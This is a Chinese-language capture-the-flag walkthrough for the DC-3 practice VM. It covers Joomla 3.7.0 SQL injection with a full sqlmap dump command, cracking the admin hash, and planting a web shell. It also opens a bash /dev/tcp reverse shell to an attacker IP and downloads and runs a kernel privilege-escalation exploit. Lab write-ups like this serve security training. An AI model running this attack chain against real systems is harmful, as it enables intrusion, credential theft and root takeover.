DC 3
DC-3
解决分配不到 IP 问题
没法找到他的 ip,可能是网卡配置问题
(之前打开 .ova 文件默认联网方式是桥接,改成NAT)
在开机选择的时候,摁 e 编辑一下
把 ro 改成 rw single init=/bin/bash
然后 ctrl+x,就可以输入东西了
ip a 查看一下实际用的是哪一个网卡
vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡
把这俩都改成 ens33,然后 /etc/init.d/networking restart 重启网卡服务
ps.我是直接关了虚拟机的电源退出来的
成功扫到
开始打
这个靶机只有一个 flag 了,要 root 权限才能看
nmap 扫一波
ps.有个 whatweb 网站指纹扫描工具
还有个针对 Joomla 的扫描工具:joomscan --url http://192.168.149.157
搜一下:searchsploit Joomla 3.7.0
sqlmap 跑一下
最终的 sqlmap 命令
sqlmap -u "http://192.168.149.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C name,password --dump -p list[fullordering]
把 password 的 hash 保存下来,使用 john 爆破,得到密码:snoopy
使用 admin/snoopy 登录
在这个地方写一句话
蚁剑连接一下
本地监听一个端口:nc -lvp 8888
终端里面执行:
bash -c 'bash -i &>/dev/tcp/192.168.149.141/8888 0>&1'
lsb_release -a 可以看到是 ubuntu 16.04
searchsploit ubuntu 16.04,大佬们说这个可以用
cat 一下,让去下这个东西:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip,就可以的呀,不知道为啥参考的文章评论区说这个 exp 没了
unzip 39772.zip #解压29772.zip文件
cd 39772
tar -xvf exploit.tar #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
./compile.sh #执行脚本,编译文件
./doubleput #执行提权文件
在 /root 目录下存着 flag